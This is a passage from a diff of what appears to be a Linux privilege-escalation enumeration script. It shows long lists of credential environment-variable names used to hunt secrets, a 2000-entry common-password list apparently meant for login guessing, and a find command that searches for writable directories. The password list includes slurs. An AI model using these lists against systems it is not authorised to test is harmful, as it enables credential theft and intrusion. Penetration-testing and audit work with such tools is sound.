pwd_in_variables10="SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|VAULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS" pwd_in_variables11="VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY" -top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston -snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker darkness cristina colorado boomer alexandra steelers serenity please montana mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar -stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade -redsox philip monday mohammed indiana energy bond007 avalon terminator skipper shopping scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports siemens santiago kathleen hotmail hamster golfer future father enterprise clifford christina camille camaro beauty 55555555 vision tornado something rosemary qweasd patches magic helena denver cracker beaver basket atlanta vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood holiday gloria element chandler booger angelo allison action 99999999 target snowman miguel marley lorraine howard harmony children celtic beatrice airborne wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze jamaica emerald bubble brooke zombie strawberry spooky software simpson service sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock sunday skywalker salvador pegasus panthers packers network mission mark legolas lacrosse kitty kelly jester italia hiphop freeman charlie1 cardinal bluemoon bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer smile rockstar operator naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345 789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701 nascar music kristen kingkong global geronimo germany country christmas bernard benson wrestling warren techno sunrise stefan sister savage russell robinson oracle millie maddog lightning kingston kennedy hannibal garcia download dollar darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic darkside cleopatra blue assassin amelia vladimir roland -nigger national monique molly matthew1 godfather frank curtis change central cartman brothers boogie archie warriors universe turkey topgun solomon sherry sakura rush2112 qwaszx office mushroom monika marion lorenzo john herman connect chopper burton blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford million martha lindsay laura jamesbond ihateyou goober giants garden diana cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina justine english electric church castle caesar birdie aurora artist amadeus alberto 246810 whitney thankyou sterling star ronnie pussy printer picasso munchkin morpheus madmax kaiser julius imperial happiness goodluck counter columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor telephone smiley saints pretty oblivion newcastle mariana janice israel imagine freedom1 detroit deedee darren catfish adriana washington warlock valentina valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo motherfucker montreal manuel madrid kramer -katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c thompson theman strike stacey science running research polaris oklahoma mariposa marie leader julia island idontknow hitman german felipe fatcat fatboy defender applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston pauline passwort original nightmare miriam martinez labrador kristin kissme henry gerald garrett flash excalibur discovery dddddd danny collins casino broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha reggie redwings poison mypassword monopoly mariah margarita lionking king football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester street stones sprite spike single sherlock sandy rocker robin matt marianne linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid prodigy paul michel martini marathon longhorn leopard judith joanne jesus1 inferno holly harold happy123 esther dudley dragon1 darwin clinton celeste catdog brucelee argentina alpine 147852369 wrangler william1 vikings trigger stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation mystery morrison honda february fantasia designer coyote cool bulldogs bernie baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless dodgers delete cougar -charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals -andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive +top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston \ +snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker darkness cristina colorado boomer alexandra steelers serenity please montana mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar \ +stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade \ +redsox philip monday mohammed indiana energy bond007 avalon terminator skipper shopping scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports siemens santiago kathleen hotmail hamster golfer future father enterprise clifford christina camille camaro beauty 55555555 vision tornado something rosemary qweasd patches magic helena denver cracker beaver basket atlanta vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood holiday gloria element chandler booger angelo allison action 99999999 target snowman miguel marley lorraine howard harmony children celtic beatrice airborne wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze jamaica emerald bubble brooke zombie strawberry spooky software simpson service sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock sunday skywalker salvador pegasus panthers packers network mission mark legolas lacrosse kitty kelly jester italia hiphop freeman charlie1 cardinal bluemoon bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer smile rockstar operator naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345 789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701 nascar music kristen kingkong global geronimo germany country christmas bernard benson wrestling warren techno sunrise stefan sister savage russell robinson oracle millie maddog lightning kingston kennedy hannibal garcia download dollar darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic darkside cleopatra blue assassin amelia vladimir roland \ +nigger national monique molly matthew1 godfather frank curtis change central cartman brothers boogie archie warriors universe turkey topgun solomon sherry sakura rush2112 qwaszx office mushroom monika marion lorenzo john herman connect chopper burton blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford million martha lindsay laura jamesbond ihateyou goober giants garden diana cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina justine english electric church castle caesar birdie aurora artist amadeus alberto 246810 whitney thankyou sterling star ronnie pussy printer picasso munchkin morpheus madmax kaiser julius imperial happiness goodluck counter columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor telephone smiley saints pretty oblivion newcastle mariana janice israel imagine freedom1 detroit deedee darren catfish adriana washington warlock valentina valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo motherfucker montreal manuel madrid kramer \ +katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c thompson theman strike stacey science running research polaris oklahoma mariposa marie leader julia island idontknow hitman german felipe fatcat fatboy defender applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston pauline passwort original nightmare miriam martinez labrador kristin kissme henry gerald garrett flash excalibur discovery dddddd danny collins casino broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha reggie redwings poison mypassword monopoly mariah margarita lionking king football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester street stones sprite spike single sherlock sandy rocker robin matt marianne linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid prodigy paul michel martini marathon longhorn leopard judith joanne jesus1 inferno holly harold happy123 esther dudley dragon1 darwin clinton celeste catdog brucelee argentina alpine 147852369 wrangler william1 vikings trigger stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation mystery morrison honda february fantasia designer coyote cool bulldogs bernie baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless dodgers delete cougar \ +charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals \ +andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive \ plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" PASSTRY="2000" #Default num of passwds to try (all by default) if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this SEDOVERFLOW=true -for grp in `groups $USER 2>/dev/null | cut -d ":" -f2`; do +for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do wgroups="$wgroups -group $grp -or " done -wgroups="`echo $wgroups | sed -e 's/ -or$//'`" +wgroups="$(echo $wgroups | sed -e 's/ -or$//')" while $SEDOVERFLOW; do #WF=`find /dev /srv /proc /home /media /sys /lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth $MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort` #if [ "$MACPEAS" ]; then - WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | sort` #OpenBSD find command doesn't have "-writable" option + WF=$(find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | sort) #OpenBSD find command doesn't have "-writable" option #else # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort` #fi - Wfolders=`printf "%s" "$WF" | tr '\n' '|'`"|[^\*][^\ ]*\ \*" - Wfolder="`printf 